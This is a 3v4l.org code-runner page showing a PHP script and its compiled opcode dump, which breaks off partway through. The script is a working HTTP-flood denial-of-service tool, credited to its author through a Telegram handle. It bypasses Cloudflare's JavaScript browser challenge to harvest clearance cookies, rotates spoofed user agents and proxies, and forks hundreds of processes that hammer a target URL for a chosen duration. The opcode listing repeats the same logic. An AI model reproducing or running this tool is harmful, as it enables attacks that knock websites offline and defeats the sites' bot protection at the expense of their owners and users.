3v4l.org

run code in 300+ PHP versions simultaneously
<?php error_reporting(E_ERROR); //color class just to make it nice [not mine] class Colors { private $foreground_colors = array(); private $background_colors = array(); public function __construct() { $this->foreground_colors['black'] = '0;30'; $this->foreground_colors['dark_gray'] = '1;30'; $this->foreground_colors['blue'] = '0;34'; $this->foreground_colors['light_blue'] = '1;34'; $this->foreground_colors['green'] = '0;32'; $this->foreground_colors['light_green'] = '1;32'; $this->foreground_colors['cyan'] = '0;36'; $this->foreground_colors['light_cyan'] = '1;36'; $this->foreground_colors['red'] = '0;31'; $this->foreground_colors['light_red'] = '1;31'; $this->foreground_colors['purple'] = '0;35'; $this->foreground_colors['light_purple'] = '1;35'; $this->foreground_colors['brown'] = '0;33'; $this->foreground_colors['yellow'] = '1;33'; $this->foreground_colors['light_gray'] = '0;37'; $this->foreground_colors['white'] = '1;37'; $this->background_colors['black'] = '40'; $this->background_colors['red'] = '41'; $this->background_colors['green'] = '42'; $this->background_colors['yellow'] = '43'; $this->background_colors['blue'] = '44'; $this->background_colors['magenta'] = '45'; $this->background_colors['cyan'] = '46'; $this->background_colors['light_gray'] = '47'; } public function getColoredString($string, $foreground_color = null, $background_color = null) { $colored_string = ""; if (isset($this->foreground_colors[$foreground_color])) { $colored_string .= "\033[" . $this->foreground_colors[$foreground_color] . "m"; } if (isset($this->background_colors[$background_color])) { $colored_string .= "\033[" . $this->background_colors[$background_color] . "m"; } $colored_string .= $string . "\033[0m"; return $colored_string; } public function getForegroundColors() { return array_keys($this->foreground_colors); } public function getBackgroundColors() { return array_keys($this->background_colors); } } $colors = new Colors(); $temp_name = time() . "_" . rand(1000, 9999); //user agents $uas = ["Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3", "Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0", "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0", "Mozilla/5.0 (X11; OpenBSD amd64; rv:28.0) Gecko/20100101 Firefox/28.0", "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0", "Mozilla/5.0 (Windows NT 6.1; rv:27.3) Gecko/20130101 Firefox/27.3", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0", "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0", "Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))", "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)", "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/4.0; InfoPath.2; SV1; .NET CLR 2.0.50727; WOW64)", "Mozilla/5.0 (compatible; MSIE 10.0; Macintosh; Intel Mac OS X 10_7_3; Trident/6.0)", "Opera/12.0(Windows NT 5.2;U;en)Presto/22.9.168 Version/12.00", "Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14", "Mozilla/5.0 (Windows NT 6.0; rv:2.0) Gecko/20100101 Firefox/4.0 Opera 12.14", "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0) Opera 12.14", "Opera/12.80 (Windows NT 5.1; U; en) Presto/2.10.289 Version/12.02", "Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.9.181 Version/12.00", "Opera/9.80 (Windows NT 5.1; U; zh-sg) Presto/2.9.181 Version/12.00", "Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0)", "HTC_Touch_3G Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11)", "Mozilla/4.0 (compatible; MSIE 7.0; Windows Phone OS 7.0; Trident/3.1; IEMobile/7.0; Nokia;N70)", "Mozilla/5.0 (BlackBerry; U; BlackBerry 9900; en) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.1.0.346 Mobile Safari/534.11+", "Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en-US) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.254 Mobile Safari/534.11+", "Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en-US) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.115 Mobile Safari/534.11+", "Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.254 Mobile Safari/534.11+", "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko) Comodo_Dragon/16.1.1.0 Chrome/16.0.912.63 Safari/535.7", "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Comodo_Dragon/4.1.1.11 Chrome/4.1.249.1042 Safari/532.5", "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.13+ (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10", "Mozilla/5.0 (iPad; CPU OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko ) Version/5.1 Mobile/9B176 Safari/7534.48.3", "Mozilla/5.0 (Windows; U; Windows NT 6.1; tr-TR) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27",]; //cf class class CFBypass { private $html; private $url; function __construct($url, $html) { $this->url = parse_url($url); $this->html = $html; } //get how many time it has to wait function getTimeout() { if(preg_match('/}, (\d+)\);/', $this->html, $matches) !== 1) return false; return $matches[1]; } //solve the challenge function sJrs() { if(!$this->isok()) return false; $query = []; if(preg_match('/name="jschl_vc" value="([^"]+)"/', $this->html, $matches) !== 1) return false; $query['jschl_vc'] = $matches[1]; if(preg_match('/name="pass" value="([^"]+)"/', $this->html, $matches) !== 1) return false; $query['pass'] = $matches[1]; $query['jschl_answer'] = $this->sJc(); return $query['jschl_answer'] ? $this->url['scheme'] . '://' . $this->url['host'] . '/cdn-cgi/l/chk_jschl?' . http_build_query($query) : false; } //check if the cookies are ok function isok() { return strpos($this->html, '/cdn-cgi/l/chk_jschl') !== false && strpos($this->html, 'challenge-form') !== false && strpos($this->html, 'jschl_vc') !== false && strpos($this->html, 'jschl_answer') !== false; } function sJc() { if(preg_match('/{"\w+":([^}]+)};/', $this->html, $matches) !== 1) return false; $challenge = self::dJs($matches[1]); if(preg_match_all('/([+\-*])=([^;]+);/', $this->html, $matches, PREG_SET_ORDER) == 0) return false; foreach($matches as $match) { $op = $match[1]; $number = self::dJs($match[2]); if(!self::mathExec($challenge, $number, $op)) return false; } return $challenge + strlen($this->url['host']); } private static function dJs($jsInt) { if(preg_match('/^\+\(\(?([^);]+)\)\+\(([^);]+)\)\)$/', $jsInt, $matches) === 1) { return self::dJs($matches[1])*10 + self::dJs($matches[2]); } else { return substr_count($jsInt, '!![]') + substr_count($jsInt, '!+[]'); } } private static function mathExec(&$a, $b, $op) { switch($op) { case '+': $a += $b; return true; case '-': $a -= $b; return true; case '*': $a *= $b; return true; case '/': $a /= $b; return true; case '%': $a %= $b; return true; } return false; } } $host = $argv[1]; //website target $proxy = $argv[5]; // proxy file (optional) $cookies_c = 0; $threads_in = $argv[2];// how many threads $whandlers = $argv[4]; // how many cookies to generate (if proxies are set, the number of cookies will be the same of the proxies) //max timeout for the proxy validation $timeout = 2; if($proxy != null){ $proxies = explode("\n", file_get_contents($proxy)); $whandlers = max(array_keys($proxies)); } echo $colors->getColoredString("Made By Andrew\nTelegram: https://t.me/Vaiiry\n", "light_red", null) . "\n"; if(!isset($argv[1]) || !isset($argv[2]) || !isset($argv[3]) || !isset($argv[4])){ echo $colors->getColoredString("Usage: php " . $argv[0] . " [URL] [THREADS] [SECONDS] [CLIENTS_NUMBER] [PROXY_FILE]", "light_green", null) . "\n"; echo $colors->getColoredString("Example: php " . $argv[0] . " http://blunter.xyz/ 800 60 20 proxies.txt", "light_green", null) . "\n"; die(); } echo $colors->getColoredString("Warning: Using proxies the attack can be slower!", "yellow", "black") . "\n"; function Delete($path) { if (is_dir($path) === true) { $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($path), RecursiveIteratorIterator::CHILD_FIRST); foreach ($files as $file) { if (in_array($file->getBasename(), array('.', '..')) !== true) { if ($file->isDir() === true) { rmdir($file->getPathName()); } else if (($file->isFile() === true) || ($file->isLink() === true)) { unlink($file->getPathname()); } } } return rmdir($path); } else if ((is_file($path) === true) || (is_link($path) === true)) { return unlink($path); } return false; } //get a session with given useragent proxy ready and returns the cookies function prepare($url, $ua, $proxy, $pid){ global $timeout; global $colors; global $argv; if($argv[5] != null){ if($proxy == ""){ return null; } } $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_USERAGENT, $ua); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, $timeout); curl_setopt($ch, CURLOPT_PROXY, $proxy); $result = curl_exec($ch); if(strpos($result, 'Checking your browser before accessing') === false && $result !== false){ if($proxy != NULL){ $proxy_text = " | PROXY: $proxy"; } var_dump($result); echo $colors->getColoredString('Initializing Cookies #' . $pid . $proxy_text . "\n", "light_red", null) . "\n"; preg_match_all('/^Set-Cookie:\s*([^;]*)/mi', $result, $matches); $cookiess = array('nothing' => 'nada'); return $cookiess; } $cf = new CFBypass($url, $result); if($cf->isok()) { if($proxy != NULL){ $proxy_text = " | PROXY: $proxy"; } echo $colors->getColoredString('Initializing Cookies #' . $pid . $proxy_text . "\n", "light_red", null) . "\n"; usleep($cf->getTimeout() * 1000); curl_setopt($ch, CURLOPT_URL, $cf->sJrs()); $result = curl_exec($ch); preg_match_all('/^Set-Cookie:\s*([^;]*)/mi', $result, $matches); $cookies = array(); foreach($matches[1] as $item) { parse_str($item, $cookie); $cookies = array_merge($cookies, $cookie); } } curl_close($ch); return $cookies; } //the attack function function attack($host, $threads, $end){ global $argv; $end = time() + $argv[3]; global $handlers; for($i = 0; $i < $threads; $i ++){ $pid = pcntl_fork(); if($pid == -1) { echo "Something went wrongs.\n"; exit(); } elseif($pid) { continue; } else { while($end > time()) { $flood = curl_init(); $handler = $handlers[array_rand($handlers)]; $cookies = $handler['cookies']; $ua = $handler['ua']; $cfduid = $cookies['__cfduid']; $clear = $cookies["cf_clearance"]; $cstr = "__cfduid=$cfduid; cf_clearance=$clear;"; $proxy = $handler['proxy']; //echo "IM USING $proxy\n"; curl_setopt($flood, CURLOPT_URL, $host); curl_setopt($flood, CURLOPT_RETURNTRANSFER, 1); curl_setopt($flood, CURLOPT_USERAGENT, $ua); curl_setopt($flood, CURLOPT_FOLLOWLOCATION, true); curl_setopt($flood, CURLOPT_PROXY, $proxy); curl_setopt($flood, CURLOPT_COOKIE, $cstr); $var123 = curl_exec($flood); curl_close($flood); } die(); } } for($j = 0; $j < $threads; $j++) { $pid = pcntl_wait($status); } } //save the handler to file to read it later bc the subprocess cant read the same variables function writeHandler($handler){ global $temp_name; if(!file_exists($temp_name)){ mkdir($temp_name); } $json = json_encode($handler); $hash = md5($json); $fo = fopen($temp_name . "/" . $hash . ".handler", "w"); fwrite($fo, $json); fclose($fo); } //read them function readHandlers(){ global $temp_name; if(!file_exists($temp_name)){ return NULL; } $handlers = scandir($temp_name . "/"); foreach($handlers as $handler) { if(is_file($temp_name . "/" .$handler)){ $handlers_array[] = json_decode(file_get_contents($temp_name . "/" .$handler), true); } } return $handlers_array; } //initialize for ($i = 1; $i <= $whandlers; ++$i) { $pid = pcntl_fork(); $ua = $uas[array_rand($uas)]; if (!$pid) { $cookies = prepare($host, $ua, $proxies[$i], $i); if($cookies != NULL){ $handler = array('cookies' => $cookies, 'ua' => $ua, 'proxy' => $proxies[$i]); //var_dump($cookies); writeHandler($handler); } exit($i); } } //wait all process getting ready while (pcntl_waitpid(0, $status) != -1) { $status = pcntl_wexitstatus($status); } $handlers = readHandlers(); Delete($temp_name . "/"); //var_dump($handlers); //start the attack echo $colors->getColoredString("Attack started!", "light_green", null) . "\n"; attack($host, $threads_in); ?>
Finding entry points
Branch analysis from position: 0
2 jumps found. (Code = 43) Position 1 = 28, Position 2 = 43
Branch analysis from position: 28
2 jumps found. (Code = 47) Position 1 = 53, Position 2 = 56
Branch analysis from position: 53
2 jumps found. (Code = 47) Position 1 = 57, Position 2 = 60
Branch analysis from position: 57
2 jumps found. (Code = 47) Position 1 = 61, Position 2 = 64
Branch analysis from position: 61
2 jumps found. (Code = 43) Position 1 = 65, Position 2 = 86
Branch analysis from position: 65
1 jumps found. (Code = 79) Position 1 = -2
Branch analysis from position: 86
1 jumps found. (Code = 42) Position 1 = 125
Branch analysis from position: 125
2 jumps found. (Code = 44) Position 1 = 127, Position 2 = 95
Branch analysis from position: 127
1 jumps found. (Code = 42) Position 1 = 132
Branch analysis from position: 132
2 jumps found. (Code = 44) Position 1 = 138, Position 2 = 128
Branch analysis from position: 138
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 128
2 jumps found. (Code = 44) Position 1 = 138, Position 2 = 128
Branch analysis from position: 138
Branch analysis from position: 128
Branch analysis from position: 95
2 jumps found. (Code = 43) Position 1 = 105, Position 2 = 124
Branch analysis from position: 105
2 jumps found. (Code = 43) Position 1 = 115, Position 2 = 123
Branch analysis from position: 115
1 jumps found. (Code = 79) Position 1 = -2
Branch analysis from position: 123
Branch analysis from position: 124
2 jumps found. (Code = 44) Position 1 = 127, Position 2 = 95
Branch analysis from position: 127
Branch analysis from position: 95
Branch analysis from position: 64
Branch analysis from position: 60
Branch analysis from position: 56
Branch analysis from position: 43
filename:       /in/qoKdR
function name:  (null)
number of ops:  157
compiled vars:  !0 = $colors, !1 = $temp_name, !2 = $uas, !3 = $host, !4 = $argv, !5 = $proxy, !6 = $cookies_c, !7 = $threads_in, !8 = $whandlers, !9 = $timeout, !10 = $proxies, !11 = $i, !12 = $pid, !13 = $ua, !14 = $cookies, !15 = $handler, !16 = $status, !17 = $handlers
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
    2     0  E >   INIT_FCALL                                               'error_reporting'
          1        SEND_VAL                                                 1
          2        DO_ICALL                                                 
   59     3        NEW                                              $19     'Colors'
          4        DO_FCALL                                      0          
          5        ASSIGN                                                   !0, $19
   62     6        INIT_FCALL                                               'time'
          7        DO_ICALL                                         $22     
          8        CONCAT                                           ~23     $22, '_'
          9        INIT_FCALL                                               'rand'
         10        SEND_VAL                                                 1000
         11        SEND_VAL                                                 9999
         12        DO_ICALL                                         $24     
         13        CONCAT                                           ~25     ~23, $24
         14        ASSIGN                                                   !1, ~25
   64    15        ASSIGN                                                   !2, <array>
  187    16        FETCH_DIM_R                                      ~28     !4, 1
         17        ASSIGN                                                   !3, ~28
  188    18        FETCH_DIM_R                                      ~30     !4, 5
         19        ASSIGN                                                   !5, ~30
  189    20        ASSIGN                                                   !6, 0
  190    21        FETCH_DIM_R                                      ~33     !4, 2
         22        ASSIGN                                                   !7, ~33
  191    23        FETCH_DIM_R                                      ~35     !4, 4
         24        ASSIGN                                                   !8, ~35
  193    25        ASSIGN                                                   !9, 2
  194    26        IS_NOT_EQUAL                                             !5, null
         27      > JMPZ                                                     ~38, ->43
  195    28    >   INIT_FCALL                                               'explode'
         29        SEND_VAL                                                 '%0A'
         30        INIT_FCALL                                               'file_get_contents'
         31        SEND_VAR                                                 !5
         32        DO_ICALL                                         $39     
         33        SEND_VAR                                                 $39
         34        DO_ICALL                                         $40     
         35        ASSIGN                                                   !10, $40
  196    36        INIT_FCALL                                               'max'
         37        INIT_FCALL                                               'array_keys'
         38        SEND_VAR                                                 !10
         39        DO_ICALL                                         $42     
         40        SEND_VAR                                                 $42
         41        DO_ICALL                                         $43     
         42        ASSIGN                                                   !8, $43
  198    43    >   INIT_METHOD_CALL                                         !0, 'getColoredString'
         44        SEND_VAL_EX                                              'Made+By+Andrew%0ATelegram%3A+https%3A%2F%2Ft.me%2FVaiiry%0A'
         45        SEND_VAL_EX                                              'light_red'
         46        SEND_VAL_EX                                              null
         47        DO_FCALL                                      0  $45     
         48        CONCAT                                           ~46     $45, '%0A'
         49        ECHO                                                     ~46
  200    50        ISSET_ISEMPTY_DIM_OBJ                         0  ~47     !4, 1
         51        BOOL_NOT                                         ~48     ~47
         52      > JMPNZ_EX                                         ~48     ~48, ->56
         53    >   ISSET_ISEMPTY_DIM_OBJ                         0  ~49     !4, 2
         54        BOOL_NOT                                         ~50     ~49
         55        BOOL                                             ~48     ~50
         56    > > JMPNZ_EX                                         ~48     ~48, ->60
         57    >   ISSET_ISEMPTY_DIM_OBJ                         0  ~51     !4, 3
         58        BOOL_NOT                                         ~52     ~51
         59        BOOL                                             ~48     ~52
         60    > > JMPNZ_EX                                         ~48     ~48, ->64
         61    >   ISSET_ISEMPTY_DIM_OBJ                         0  ~53     !4, 4
         62        BOOL_NOT                                         ~54     ~53
         63        BOOL                                             ~48     ~54
         64    > > JMPZ                                                     ~48, ->86
  201    65    >   INIT_METHOD_CALL                                         !0, 'getColoredString'
         66        FETCH_DIM_R                                      ~55     !4, 0
         67        CONCAT                                           ~56     'Usage%3A+php+', ~55
         68        CONCAT                                           ~57     ~56, '+%5BURL%5D+%5BTHREADS%5D+%5BSECONDS%5D+%5BCLIENTS_NUMBER%5D+%5BPROXY_FILE%5D'
         69        SEND_VAL_EX                                              ~57
         70        SEND_VAL_EX                                              'light_green'
         71        SEND_VAL_EX                                              null
         72        DO_FCALL                                      0  $58     
         73        CONCAT                                           ~59     $58, '%0A'
         74        ECHO                                                     ~59
  202    75        INIT_METHOD_CALL                                         !0, 'getColoredString'
         76        FETCH_DIM_R                                      ~60     !4, 0
         77        CONCAT                                           ~61     'Example%3A+php+', ~60
         78        CONCAT                                           ~62     ~61, '+http%3A%2F%2Fblunter.xyz%2F+800+60+20+proxies.txt'
         79        SEND_VAL_EX                                              ~62
         80        SEND_VAL_EX                                              'light_green'
         81        SEND_VAL_EX                                              null
         82        DO_FCALL                                      0  $63     
         83        CONCAT                                           ~64     $63, '%0A'
         84        ECHO                                                     ~64
  203    85      > EXIT                                                     
  205    86    >   INIT_METHOD_CALL                                         !0, 'getColoredString'
         87        SEND_VAL_EX                                              'Warning%3A+Using+proxies+the+attack+can+be+slower%21'
         88        SEND_VAL_EX                                              'yellow'
         89        SEND_VAL_EX                                              'black'
         90        DO_FCALL                                      0  $65     
         91        CONCAT                                           ~66     $65, '%0A'
         92        ECHO                                                     ~66
  364    93        ASSIGN                                                   !11, 1
         94      > JMP                                                      ->125
  365    95    >   INIT_FCALL_BY_NAME                                       'pcntl_fork'
         96        DO_FCALL                                      0  $68     
         97        ASSIGN                                                   !12, $68
  366    98        INIT_FCALL                                               'array_rand'
         99        SEND_VAR                                                 !2
        100        DO_ICALL                                         $70     
        101        FETCH_DIM_R                                      ~71     !2, $70
        102        ASSIGN                                                   !13, ~71
  367   103        BOOL_NOT                                         ~73     !12
        104      > JMPZ                                                     ~73, ->124
  368   105    >   INIT_FCALL                                               'prepare'
        106        SEND_VAR                                                 !3
        107        SEND_VAR                                                 !13
        108        FETCH_DIM_R                                      ~74     !10, !11
        109        SEND_VAL                                                 ~74
        110        SEND_VAR                                                 !11
        111        DO_FCALL                                      0  $75     
        112        ASSIGN                                                   !14, $75
  369   113        IS_NOT_EQUAL                                             !14, null
        114      > JMPZ                                                     ~77, ->123
  370   115    >   INIT_ARRAY                                       ~78     !14, 'cookies'
        116        ADD_ARRAY_ELEMENT                                ~78     !13, 'ua'
        117        FETCH_DIM_R                                      ~79     !10, !11
        118        ADD_ARRAY_ELEMENT                                ~78     ~79, 'proxy'
        119        ASSIGN                                                   !15, ~78
  372   120        INIT_FCALL                                               'writehandler'
        121        SEND_VAR                                                 !15
        122        DO_FCALL                                      0          
  374   123    > > EXIT                                                     !11
  364   124    >   PRE_INC                                                  !11
        125    >   IS_SMALLER_OR_EQUAL                                      !11, !8
        126      > JMPNZ                                                    ~83, ->95
  378   127    > > JMP                                                      ->132
  379   128    >   INIT_FCALL_BY_NAME                                       'pcntl_wexitstatus'
        129        SEND_VAR_EX                                              !16
        130        DO_FCALL                                      0  $84     
        131        ASSIGN                                                   !16, $84
  378   132    >   INIT_FCALL_BY_NAME                                       'pcntl_waitpid'
        133        SEND_VAL_EX                                              0
        134        SEND_VAR_EX                                              !16
        135        DO_FCALL                                      0  $86     
        136        IS_NOT_EQUAL                                             $86, -1
        137      > JMPNZ                                                    ~87, ->128
  382   138    >   INIT_FCALL                                               'readhandlers'
        139        DO_FCALL                                      0  $88     
        140        ASSIGN                                                   !17, $88
  383   141        INIT_FCALL                                               'delete'
        142        CONCAT                                           ~90     !1, '%2F'
        143        SEND_VAL                                                 ~90
        144        DO_FCALL                                      0          
  386   145        INIT_METHOD_CALL                                         !0, 'getColoredString'
        146        SEND_VAL_EX                                              'Attack+started%21'
        147        SEND_VAL_EX                                              'light_green'
        148        SEND_VAL_EX                                              null
        149        DO_FCALL                                      0  $92     
        150        CONCAT                                           ~93     $92, '%0A'
        151        ECHO                                                     ~93
  387   152        INIT_FCALL                                               'attack'
        153        SEND_VAR                                                 !3
        154        SEND_VAR                                                 !7
        155        DO_FCALL                                      0          
  388   156      > RETURN                                                   1

Function delete:
Finding entry points
Branch analysis from position: 0
2 jumps found. (Code = 43) Position 1 = 6, Position 2 = 52
Branch analysis from position: 6
2 jumps found. (Code = 77) Position 1 = 15, Position 2 = 46
Branch analysis from position: 15
2 jumps found. (Code = 78) Position 1 = 16, Position 2 = 46
Branch analysis from position: 16
2 jumps found. (Code = 43) Position 1 = 21, Position 2 = 45
Branch analysis from position: 21
2 jumps found. (Code = 43) Position 1 = 25, Position 2 = 31
Branch analysis from position: 25
1 jumps found. (Code = 42) Position 1 = 45
Branch analysis from position: 45
1 jumps found. (Code = 42) Position 1 = 15
Branch analysis from position: 15
Branch analysis from position: 31
2 jumps found. (Code = 47) Position 1 = 35, Position 2 = 39
Branch analysis from position: 35
2 jumps found. (Code = 43) Position 1 = 40, Position 2 = 45
Branch analysis from position: 40
1 jumps found. (Code = 42) Position 1 = 15
Branch analysis from position: 15
Branch analysis from position: 45
Branch analysis from position: 39
Branch analysis from position: 45
Branch analysis from position: 46
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 46
Branch analysis from position: 52
2 jumps found. (Code = 47) Position 1 = 57, Position 2 = 62
Branch analysis from position: 57
2 jumps found. (Code = 43) Position 1 = 63, Position 2 = 67
Branch analysis from position: 63
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 67
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 62
filename:       /in/qoKdR
function name:  Delete
number of ops:  69
compiled vars:  !0 = $path, !1 = $files, !2 = $file
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
  207     0  E >   RECV                                             !0      
  209     1        INIT_FCALL                                               'is_dir'
          2        SEND_VAR                                                 !0
          3        DO_ICALL                                         $3      
          4        TYPE_CHECK                                    8          $3
          5      > JMPZ                                                     ~4, ->52
  211     6    >   NEW                                              $5      'RecursiveIteratorIterator'
          7        NEW                                              $6      'RecursiveDirectoryIterator'
          8        SEND_VAR_EX                                              !0
          9        DO_FCALL                                      0          
         10        SEND_VAR_NO_REF_EX                                       $6
         11        SEND_VAL_EX                                              2
         12        DO_FCALL                                      0          
         13        ASSIGN                                                   !1, $5
  213    14      > FE_RESET_R                                       $10     !1, ->46
         15    > > FE_FETCH_R                                               $10, !2, ->46
  215    16    >   INIT_METHOD_CALL                                         !2, 'getBasename'
         17        DO_FCALL                                      0  $11     
         18        IN_ARRAY                                         ~12     $11, <array>
         19        TYPE_CHECK                                  1014          ~12
         20      > JMPZ                                                     ~13, ->45
  217    21    >   INIT_METHOD_CALL                                         !2, 'isDir'
         22        DO_FCALL                                      0  $14     
         23        TYPE_CHECK                                    8          $14
         24      > JMPZ                                                     ~15, ->31
  219    25    >   INIT_FCALL                                               'rmdir'
         26        INIT_METHOD_CALL                                         !2, 'getPathName'
         27        DO_FCALL                                      0  $16     
         28        SEND_VAR                                                 $16
         29        DO_ICALL                                                 
         30      > JMP                                                      ->45
  222    31    >   INIT_METHOD_CALL                                         !2, 'isFile'
         32        DO_FCALL                                      0  $18     
         33        TYPE_CHECK                                    8  ~19     $18
         34      > JMPNZ_EX                                         ~19     ~19, ->39
         35    >   INIT_METHOD_CALL                                         !2, 'isLink'
         36        DO_FCALL                                      0  $20     
         37        TYPE_CHECK                                    8  ~21     $20
         38        BOOL                                             ~19     ~21
         39    > > JMPZ                                                     ~19, ->45
  224    40    >   INIT_FCALL                                               'unlink'
         41        INIT_METHOD_CALL                                         !2, 'getPathname'
         42        DO_FCALL                                      0  $22     
         43        SEND_VAR                                                 $22
         44        DO_ICALL                                                 
  213    45    > > JMP                                                      ->15
         46    >   FE_FREE                                                  $10
  229    47        INIT_FCALL                                               'rmdir'
         48        SEND_VAR                                                 !0
         49        DO_ICALL                                         $24     
         50      > RETURN                                                   $24
         51*       JMP                                                      ->67
  232    52    >   INIT_FCALL                                               'is_file'
         53        SEND_VAR                                                 !0
         54        DO_ICALL                                         $25     
         55        TYPE_CHECK                                    8  ~26     $25
         56      > JMPNZ_EX                                         ~26     ~26, ->62
         57    >   INIT_FCALL                                               'is_link'
         58        SEND_VAR                                                 !0
         59        DO_ICALL                                         $27     
         60        TYPE_CHECK                                    8  ~28     $27
         61        BOOL                                             ~26     ~28
         62    > > JMPZ                                                     ~26, ->67
  234    63    >   INIT_FCALL                                               'unlink'
         64        SEND_VAR                                                 !0
         65        DO_ICALL                                         $29     
         66      > RETURN                                                   $29
  237    67    > > RETURN                                                   <false>
  238    68*     > RETURN                                                   null

End of function delete

Function prepare:
Finding entry points
Branch analysis from position: 0
2 jumps found. (Code = 43) Position 1 = 10, Position 2 = 13
Branch analysis from position: 10
2 jumps found. (Code = 43) Position 1 = 12, Position 2 = 13
Branch analysis from position: 12
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 13
2 jumps found. (Code = 46) Position 1 = 62, Position 2 = 64
Branch analysis from position: 62
2 jumps found. (Code = 43) Position 1 = 65, Position 2 = 90
Branch analysis from position: 65
2 jumps found. (Code = 43) Position 1 = 67, Position 2 = 70
Branch analysis from position: 67
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 70
Branch analysis from position: 90
2 jumps found. (Code = 43) Position 1 = 98, Position 2 = 151
Branch analysis from position: 98
2 jumps found. (Code = 43) Position 1 = 100, Position 2 = 103
Branch analysis from position: 100
2 jumps found. (Code = 77) Position 1 = 139, Position 2 = 150
Branch analysis from position: 139
2 jumps found. (Code = 78) Position 1 = 140, Position 2 = 150
Branch analysis from position: 140
1 jumps found. (Code = 42) Position 1 = 139
Branch analysis from position: 139
Branch analysis from position: 150
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 150
Branch analysis from position: 103
Branch analysis from position: 151
Branch analysis from position: 64
Branch analysis from position: 13
filename:       /in/qoKdR
function name:  prepare
number of ops:  156
compiled vars:  !0 = $url, !1 = $ua, !2 = $proxy, !3 = $pid, !4 = $timeout, !5 = $colors, !6 = $argv, !7 = $ch, !8 = $result, !9 = $proxy_text, !10 = $matches, !11 = $cookiess, !12 = $cf, !13 = $cookies, !14 = $item, !15 = $cookie
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
  240     0  E >   RECV                                             !0      
          1        RECV                                             !1      
          2        RECV                                             !2      
          3        RECV                                             !3      
  241     4        BIND_GLOBAL                                              !4, 'timeout'
  242     5        BIND_GLOBAL                                              !5, 'colors'
  243     6        BIND_GLOBAL                                              !6, 'argv'
  244     7        FETCH_DIM_R                                      ~16     !6, 5
          8        IS_NOT_EQUAL                                             ~16, null
          9      > JMPZ                                                     ~17, ->13
  245    10    >   IS_EQUAL                                                 !2, ''
         11      > JMPZ                                                     ~18, ->13
  246    12    > > RETURN                                                   null
  249    13    >   INIT_FCALL_BY_NAME                                       'curl_init'
         14        DO_FCALL                                      0  $19     
         15        ASSIGN                                                   !7, $19
  250    16        INIT_FCALL_BY_NAME                                       'curl_setopt'
         17        SEND_VAR_EX                                              !7
         18        FETCH_CONSTANT                                   ~21     'CURLOPT_URL'
         19        SEND_VAL_EX                                              ~21
         20        SEND_VAR_EX                                              !0
         21        DO_FCALL                                      0          
  251    22        INIT_FCALL_BY_NAME                                       'curl_setopt'
         23        SEND_VAR_EX                                              !7
         24        FETCH_CONSTANT                                   ~23     'CURLOPT_USERAGENT'
         25        SEND_VAL_EX                                              ~23
         26        SEND_VAR_EX                                              !1
         27        DO_FCALL                                      0          
  252    28        INIT_FCALL_BY_NAME                                       'curl_setopt'
